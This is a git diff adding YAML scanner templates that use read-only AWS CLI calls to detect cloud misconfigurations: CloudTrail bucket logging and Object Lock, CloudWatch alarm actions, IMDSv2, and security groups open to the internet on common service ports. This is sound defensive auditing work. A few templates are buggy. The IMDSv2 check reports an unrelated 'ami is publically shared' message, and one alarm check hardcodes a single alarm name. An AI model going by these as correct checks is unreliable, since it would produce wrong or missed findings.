+ for(let BucketNames of iterate(template.buckets)){
+ set("bucket", BucketNames)
+ code(3)
+ }
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json
+
+ extractors:
+ - type: json
+ name: cloudtrailname
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].S3BucketName'
+
+ extractors:
+ - type: json
+ name: buckets
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-bucket-logging --bucket $bucket --query 'LoggingEnabled'
+
+ matchers:
+ - type: word
+ words:
+ - 'null'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Access logging is not enabled for the S3 bucket associated with CloudTrail trail " + trail'
+# digest: 4a0a00473045022100fc881c1ddc9a2e0229e8f3fbac211a1e5c3b7dac4363cd0611c002a55f455dc602201c3c0d885e1b03e7c10a09dbe42871bd2eeb1ffb62360ece9e5297a0d07e6953:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml
new file mode 100644
index 0000000000..eea6307c9b
--- /dev/null
+++ b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml
@@ -0,0 +1,74 @@
+id: s3-object-lock-not-enabled
+info:
+ name: CloudTrail S3 Object Lock
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensure Amazon CloudTrail S3 buckets have Object Lock enabled to prevent log deletion and ensure regulatory compliance.
+ impact: |
+ Without Object Lock, S3 objects such as CloudTrail logs can be deleted, compromising audit trails and violating compliance requirements.
+ remediation: |
+ Enable S3 Object Lock in Governance mode with a retention period that meets your compliance requirements for CloudTrail S3 buckets.
+ reference:
+ - https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html
+ tags: cloud,devops,aws,amazon,s3,aws-cloud-config
+
+variables:
+ region: "ap-south-1"
+
+flow: |
+ code(1)
+ for(let CloudTrail of iterate(template.cloudtrailname)){
+ set("trail", CloudTrail)
+ code(2)
+ for(let BucketNames of iterate(template.buckets)){
+ set("bucket", BucketNames)
+ code(3)
+ }
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json
+
+ extractors:
+ - type: json
+ name: cloudtrailname
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].S3BucketName'
+
+ extractors:
+ - type: json
+ name: buckets
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws s3api get-object-lock-configuration --bucket $bucket --query 'ObjectLockConfiguration.ObjectLockEnabled' --output json
+
+ matchers:
+ - type: word
+ part: code_3_stderr
+ words:
+ - 'ObjectLockConfigurationNotFoundError'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The Object Lock feature is not enabled for the S3 bucket associated with the CloudTrail trail " + trail'
+# digest: 4b0a00483046022100cdae2dc4719a039aae0873a5c1a1b4f5797593a1f555ee93a6752d408a181ebd022100f0decf46ad9b338bbcd2ea531acf088dcb76a0e605d9d7032130351113b92b43:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudwatch/cw-alarm-action-set.yaml b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml
new file mode 100644
index 0000000000..5d5a969bd9
--- /dev/null
+++ b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml
@@ -0,0 +1,56 @@
+id: cw-alarm-action-set
+info:
+ name: CloudWatch Alarm Action Not Set
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensure Amazon CloudWatch alarms have actions configured for the ALARM state to automate response to incidents.
+ impact: |
+ Without actions, CloudWatch alarms may not trigger automated incident response or notifications, potentially delaying mitigation.
+ remediation: |
+ Configure at least one action for each CloudWatch alarm to ensure timely response to monitored issues.
+ reference:
+ - https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html
+ tags: cloud,devops,aws,amazon,cloudwatch,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let AlarmName of iterate(template.alarms)){
+ set("alarm", AlarmName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudwatch describe-alarms --region $region --query 'MetricAlarms[].AlarmName' --output json
+
+ extractors:
+ - type: json
+ name: alarms
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudwatch describe-alarms --region $region --alarm-names "$alarm" --query 'MetricAlarms[*].AlarmActions[]' --output json
+
+ matchers:
+ - type: word
+ words:
+ - "[]"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The Amazon CloudWatch " + alarm +" is not configured with any actions for the ALARM state."'
+# digest: 4a0a004730450220699edd21da9a908d8160230a38300e78c76cce31988d83565ed8b7a0c9b41d70022100c607f34933362074e992f81390dae32347f888ffa68a9d97aac8aad03a388f55:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/cloudwatch/cw-alarms-actions.yaml b/cloud/aws/cloudwatch/cw-alarms-actions.yaml
new file mode 100644
index 0000000000..d3d3bf23e9
--- /dev/null
+++ b/cloud/aws/cloudwatch/cw-alarms-actions.yaml
@@ -0,0 +1,56 @@
+id: cw-alarms-actions
+info:
+ name: CloudWatch Alarms Actions Enabled
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure that all Amazon CloudWatch alarms have actions enabled (ActionEnabled: true) to respond to state changes.
+ impact: |
+ Without actions enabled, CloudWatch alarms cannot perform automated actions in response to state changes, potentially missing critical alerts.
+ remediation: |
+ Enable actions for each CloudWatch alarm by setting the ActionEnabled parameter to true, allowing for automated responses to alarms.
+ reference:
+ - https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html
+ tags: cloud,devops,aws,amazon,cloudwatch,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let AlarmName of iterate(template.alarms)){
+ set("alarm", AlarmName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudwatch describe-alarms --region $region --query 'MetricAlarms[].AlarmName' --output json
+
+ extractors:
+ - type: json
+ name: alarms
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws cloudwatch describe-alarms --region $region --alarm-names "DiskWritesOpsAlarm" --query 'MetricAlarms[*].ActionsEnabled'
+
+ matchers:
+ - type: word
+ words:
+ - "false"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The Amazon CloudWatch " + alarm + " does not have any active actions configured"'
+# digest: 4b0a00483046022100c25b4a5bed3d8e28421708a03ab05c2b09f619f6c38472a34377d2db18e4d730022100d057819cf7fbf55503e3a93b82daa4b438fb204056422e34bbcb5a6ddb4d425e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-imdsv2.yaml b/cloud/aws/ec2/ec2-imdsv2.yaml
new file mode 100644
index 0000000000..d10f792c17
--- /dev/null
+++ b/cloud/aws/ec2/ec2-imdsv2.yaml
@@ -0,0 +1,56 @@
+id: ec2-imdsv2
+info:
+ name: Enforce IMDSv2 on EC2 Instances
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensure all EC2 instances use Instance Metadata Service Version 2 (IMDSv2) for enhanced security when requesting instance metadata, protecting against certain types of attacks that target the older version, IMDSv1.
+ impact: |
+ Using IMDSv1 can expose EC2 instances to server-side request forgery (SSRF) attacks, potentially allowing attackers to access sensitive instance metadata.
+ remediation: |
+ Modify the EC2 instance metadata options to set `HttpTokens` to `required`, enforcing the use of IMDSv2. This can be done via the AWS Management Console, CLI, or EC2 API.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let InstancesName of iterate(template.instances)){
+ set("ec2instance", InstancesName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-instances --region $region --output table --query 'Reservations[*].Instances[*].InstanceId' --output json
+
+ extractors:
+ - type: json
+ name: instances
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-instances --region $region --instance-ids $ec2instance --query 'Reservations[*].Instances[*].MetadataOptions.HttpTokens[]'
+ matchers:
+ - type: word
+ words:
+ - "optional"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - 'ami + " is publically shared"'
+# digest: 4b0a00483046022100a9c93182cc816c3d5bc33cf11b0b8fa7f667153ee8f1c742c1c50da21309f666022100eec3b3b58d54dc9609e9b3b5cbe5feefd239ed07c12958cf75456d961aa3258a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-public-ip.yaml b/cloud/aws/ec2/ec2-public-ip.yaml
new file mode 100644
index 0000000000..97edc1e31d
--- /dev/null
+++ b/cloud/aws/ec2/ec2-public-ip.yaml
@@ -0,0 +1,56 @@
+id: ec2-public-ip
+info:
+ name: Public IP on EC2 Instances
+ author: princechaddha
+ severity: unknown
+ description: |
+ Ensures Amazon EC2 instances, especially backend ones, do not use public IP addresses to minimize Internet exposure.
+ impact: |
+ Instances with public IP addresses are more vulnerable to Internet-based threats, compromising network security.
+ remediation: |
+ Restrict public IP assignment for EC2 instances, particularly for backend instances. Use private IPs and manage access via AWS VPC and security groups.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let InstancesName of iterate(template.instances)){
+ set("ec2instance", InstancesName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-instances --region $region --output json --query 'Reservations[*].Instances[*].InstanceId'
+
+ extractors:
+ - type: json
+ name: instances
+ internal: true
+ json:
+ - '.[].[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-instances --region $region --instance-ids $ec2instance --query "Reservations[*].Instances[*].NetworkInterfaces[*].Association.IpOwnerId[] | []"
+
+ matchers:
+ - type: word
+ words:
+ - "amazon"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The Amazon Instance " + ec2instance + " uses public IP addresses"'
+# digest: 4a0a00473045022100f1dcc6e7fab82b9688102b0f02fddc8c9930007bc885800ac26e4e5ea412ed670220667fdf2d67ebff9d4346a853856402dbd78197c727feae253e6629f53de0f957:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-sg-egress-open.yaml b/cloud/aws/ec2/ec2-sg-egress-open.yaml
new file mode 100644
index 0000000000..77bbec7c2d
--- /dev/null
+++ b/cloud/aws/ec2/ec2-sg-egress-open.yaml
@@ -0,0 +1,57 @@
+id: ec2-sg-egress-open
+info:
+ name: Open Egress in EC2 Security Group
+ author: princechaddha
+ severity: high
+ description: |
+ Checks for unrestricted outbound/egress rules in Amazon EC2 security groups, highlighting potential over-permissive configurations.
+ impact: |
+ Allows unrestricted outbound traffic from EC2 instances, increasing the risk of data exfiltration and malicious external communications.
+ remediation: |
+ Restrict egress traffic in EC2 security groups to only necessary IP addresses and ranges, adhering to the Principle of Least Privilege.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html#sg-rules
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let SecurityGroup of iterate(template.securitygroups)){
+ set("groupid", SecurityGroup)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroups
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --group-ids $groupid --query 'SecurityGroups[*].IpPermissionsEgress[]'
+
+ matchers:
+ - type: word
+ words:
+ - "0.0.0.0/0"
+ - "::/0"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Amazon EC2 security group(s) " + groupid + " allows unrestricted outbound traffic"'
+# digest: 490a0046304402200e8c75db5d5e8809d4e97173605a8d845e49d80bd788de5a7ba6cefc77f9110202200e57d1342300e4858c189e8dd15e8084cbf17f2f75ab3f8fbe8134979f4a6bbe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-sg-ingress.yaml b/cloud/aws/ec2/ec2-sg-ingress.yaml
new file mode 100644
index 0000000000..5734057e9b
--- /dev/null
+++ b/cloud/aws/ec2/ec2-sg-ingress.yaml
@@ -0,0 +1,57 @@
+id: ec2-sg-ingress
+info:
+ name: Unrestricted Access on Uncommon EC2 Ports
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure Amazon EC2 security groups do not allow unrestricted access (0.0.0.0/0, ::/0) on uncommon ports, protecting against brute force attacks on EC2 instances.
+ impact: |
+ Unrestricted ingress on uncommon ports increases the risk of unauthorized access and potential brute force attacks on EC2 instances.
+ remediation: |
+ Restrict access to uncommon ports in EC2 security groups, permitting only necessary traffic and implementing stringent access controls.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-rules-reference.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let SecurityGroup of iterate(template.securitygroups)){
+ set("groupid", SecurityGroup)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroups
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --group-ids $groupid --query 'SecurityGroups[*].IpPermissions[]'
+
+ matchers:
+ - type: word
+ words:
+ - "0.0.0.0/0"
+ - "::/0"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Amazon EC2 security group(s) " + groupid + " allows unrestricted inbound traffic"'
+# digest: 4b0a004830460221009b9e3e94679739de1a688c3b15bc4f592472272245df9bfbc675211eeaa6f45602210097597c2bae7f04a1d2440e25e37986679daa91e6e8fe277cb1fb99874d2e5fd0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-cifs.yaml b/cloud/aws/ec2/ec2-unrestricted-cifs.yaml
new file mode 100644
index 0000000000..973098b7bf
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-cifs.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-cifs
+info:
+ name: EC2 Unrestricted CIFS Access
+ author: princechaddha
+ severity: critical
+ description: |
+ Checks for inbound rules in Amazon EC2 security groups allowing unrestricted access (0.0.0.0/0 or ::/0) on TCP port 445, used for CIFS/SMB file sharing, posing a high security risk.
+ impact: |
+ Unrestricted CIFS access can expose EC2 instances to unwanted external access, increasing the risk of data breaches and unauthorized control over resources.
+ remediation: |
+ Restrict inbound access on TCP port 445 to known IPs or ranges. Regularly review security group configurations to ensure compliance with security policies.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=445 Name=ip-permission.to-port,Values=445 Name=ip-permission.cidr,Values='0.0.0.0/0' Name=ip-permission.ipv6-cidr,Values='::/0' --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 445"'
+# digest: 4a0a00473045022100d07b38ee532d1cb1f6cca8d1384049e416bf72bae10727fe3f0fdd70bddf65730220384a7997d216466edabd10fe2f011460f0ade329929e41bf322977aac2d21a43:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-dns.yaml b/cloud/aws/ec2/ec2-unrestricted-dns.yaml
new file mode 100644
index 0000000000..9890836e91
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-dns.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-dns
+info:
+ name: Unrestricted DNS Access in EC2
+ author: princechaddha
+ severity: critical
+ description: |
+ Checks for inbound rules in Amazon EC2 security groups that allow unrestricted access (0.0.0.0/0 or ::/0) on TCP/UDP port 53, which can expose DNS servers to potential attacks.
+ impact: |
+ Allowing unrestricted access to DNS services can lead to DNS spoofing, DDoS attacks, and unauthorized access to internal networks.
+ remediation: |
+ Restrict the inbound rules for TCP/UDP port 53 in EC2 security groups to known, trusted IPs only. Ensure security group rules are tightly controlled and monitored.
+ reference:
+ - https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#SecurityGroupRules
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=53 Name=ip-permission.to-port,Values=53 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 53"'
+# digest: 490a0046304402207a2ebb618db4c24fc0d9e868b09e8689a7ccee1c419c1e446d549e2231bf20d202202c9b7cdcef58014affe10a86649a319995447be182a50a5910e13f4911bb9676:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-ftp.yaml b/cloud/aws/ec2/ec2-unrestricted-ftp.yaml
new file mode 100644
index 0000000000..15c0fed896
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-ftp.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-ftp
+info:
+ name: Restrict EC2 FTP Access
+ author: princechaddha
+ severity: critical
+ description: |
+ Ensure Amazon EC2 security groups disallow unrestricted inbound FTP access on TCP ports 20 and 21 to prevent brute force attacks.
+ impact: |
+ Unrestricted FTP access can expose EC2 instances to unauthorized access and brute force attacks, compromising security.
+ remediation: |
+ Restrict inbound access on TCP ports 20 and 21 for EC2 security groups to known IPs or remove the rules if FTP is not required.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html#security-group-rules
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=20,21 Name=ip-permission.to-port,Values=20,21 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 20 or 21"'
+# digest: 4a0a0047304502205f388ef25cd4e10ea8b0ca947a8100c1b849e7503e01c6485d3d23c30e190d16022100a24ea5679098a9da74b661c8375a32c2e91cb9e9e82682ffdd981cc1b1c78e79:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-http.yaml b/cloud/aws/ec2/ec2-unrestricted-http.yaml
new file mode 100644
index 0000000000..b75d877373
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-http.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-http
+info:
+ name: Unrestricted HTTP on EC2
+ author: princechaddha
+ severity: critical
+ description: |
+ Checks for inbound rules in EC2 security groups allowing unrestricted access (0.0.0.0/0) to TCP port 80, increasing exposure to potential breaches.
+ impact: |
+ Unrestricted access to TCP port 80 can lead to unauthorized data exposure and increases the risk of security breaches.
+ remediation: |
+ Restrict inbound traffic on TCP port 80 to only necessary IP addresses, adhering to the principle of least privilege.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=80 Name=ip-permission.to-port,Values=80 Name=ip-permission.cidr,Values='0.0.0.0/0' --query 'SecurityGroups[*].GroupId' --output json
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 80"'
+# digest: 490a00463044022039ebe4ac309956dc8ff7776b17a3982b8cfeadd66b69889950778ef07fca54e3022046047a1017a92794e037d6ad1472d3365ca94835c8071764cad1e8996d99eae0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-https.yaml b/cloud/aws/ec2/ec2-unrestricted-https.yaml
new file mode 100644
index 0000000000..c4939cb9ab
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-https.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-https
+info:
+ name: Unrestricted HTTPs on EC2
+ author: princechaddha
+ severity: critical
+ description: |
+ Checks for inbound rules in EC2 security groups allowing unrestricted access (0.0.0.0/0) to TCP port 443, increasing exposure to potential breaches.
+ impact: |
+ Unrestricted access to TCP port 443 can lead to unauthorized data exposure and increases the risk of security breaches.
+ remediation: |
+ Restrict inbound traffic on TCP port 443 to only necessary IP addresses, adhering to the principle of least privilege.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=443 Name=ip-permission.to-port,Values=443 Name=ip-permission.cidr,Values='0.0.0.0/0' --query 'SecurityGroups[*].GroupId' --output json
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 443"'
+# digest: 4a0a00473045022011c3ec5cdc908912df52c3e254be0010bede95ce080cf0083b2080a5b08b3779022100d719db5872cfb0485e6384332bf6b256c00ce754226c59fd1f4a9ce5d7956750:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-icmp.yaml b/cloud/aws/ec2/ec2-unrestricted-icmp.yaml
new file mode 100644
index 0000000000..5b0bce764f
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-icmp.yaml
@@ -0,0 +1,38 @@
+id: ec2-unrestricted-icmp
+info:
+ name: Restrict EC2 ICMP Access
+ author: princechaddha
+ severity: critical
+ description: |
+ Checks for Amazon EC2 security groups with inbound rules allowing unrestricted ICMP access. Advises restricting ICMP to trusted IPs to uphold the Principle of Least Privilege and minimize the attack surface.
+ impact: |
+ Unrestricted ICMP can be used for network reconnaissance and Distributed Denial of Service (DDoS) attacks, posing a significant security risk.
+ remediation: |
+ Modify EC2 security group rules to limit ICMP access to necessary, trusted IP addresses/ranges only.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-rules-reference.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.protocol,Values=icmp Name=ip-permission.cidr,Values='0.0.0.0/0' --query 'SecurityGroups[*].GroupId' --output json
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted ICMP access (0.0.0.0/0 or ::/0)"'
+# digest: 4a0a0047304502201c1e1628656627c21447c7abc8072f76f2a62c9d1e6cadb470ecb80db95258ce022100b4302e8fb947bc6c9bdcd1344ce69898da49781c66a9574bba9bd2eb7920ed35:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-memcached.yaml b/cloud/aws/ec2/ec2-unrestricted-memcached.yaml
new file mode 100644
index 0000000000..1a0e2e69f9
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-memcached.yaml
@@ -0,0 +1,37 @@
+id: ec2-unrestricted-memcached
+info:
+ name: Unrestricted Access to Memcached
+ author: princechaddha
+ severity: critical
+ description: |
+ Detects unrestricted inbound access to Memcached on Amazon EC2 instances, which can lead to cache poisoning, unauthorized access, and DDoS attacks.
+ impact: |
+ Unrestricted access increases the risk of cache poisoning, unauthorized data access, and potential DDoS attacks on the Memcached server.
+ remediation: |
+ Restrict inbound access to Memcached by updating EC2 security group rules to allow only trusted IPs to connect on TCP/UDP port 11211.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html
+ tags: cloud,devops,aws,amazon,ec2,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=11211 Name=ip-permission.to-port,Values=11211 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId'
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 11211"'
+# digest: 490a0046304402202b6556d6f2df24efabf60ee89f51b5d4d241a0017dfc7b025c95824cdcc26e290220204a2254be4259786fc50401c47fbb35ad21e621c90cf829f74c56d8297ef644:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/ec2/ec2-unrestricted-mongodb.yaml b/cloud/aws/ec2/ec2-unrestricted-mongodb.yaml
new file mode 100644
index 0000000000..a8644e0e93
--- /dev/null
+++ b/cloud/aws/ec2/ec2-unrestricted-mongodb.yaml
@@ -0,0 +1,39 @@
+id: ec2-unrestricted-mongodb
+info:
+ name: Unrestricted MongoDB Access in EC2
+ author: princechaddha
+ severity: critical
+ description: |
+ Identifies open access to MongoDB in AWS EC2 security groups, where inbound rules allow unrestricted access (0.0.0.0/0 or ::/0) to TCP port 27017. This poses a significant risk as it can lead to unauthorized access and potential data breaches.
+ impact: |
+ Allowing unrestricted access to MongoDB in EC2 can lead to unauthorized data access, data manipulation, or denial of service attacks, potentially resulting in critical data breaches and compliance violations.
+ remediation: |
+ Restrict MongoDB's TCP port 27017 access in EC2 security groups to only those IP addresses that require it, adhering to the principle of least privilege.
+ reference:
+ - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html
+ - https://www.mongodb.com/docs/manual/security/
+ tags: cloud,devops,aws,amazon,ec2,mongodb,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=27017 Name=ip-permission.to-port,Values=27017 Name=ip-permission.cidr,Values='0.0.0.0/0' --query 'SecurityGroups[*].GroupId' --output json
+ aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=27017 Name=ip-permission.to-port,Values=27017 Name=ip-permission.ipv6-cidr,Values='::/0' --query 'SecurityGroups[*].GroupId' --output json
+
+ extractors:
+ - type: json
+ name: securitygroup
+ internal: true
+ json:
+ - '.[]'
+
+ - type: dsl
+ dsl:
+ - 'securitygroup + " security group(s) alows unrestricted mongodb access (0.0.0.0/0 or ::/0) on port 27017"'
+# digest: 4b0a0048304602210083e0104b459e8885610b9980b58d725caea579be4660fb40a27750097b47336d022100bc5f067c97ab723d4b4282cfabbf3795e702259686d1d368963d120707913ee5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
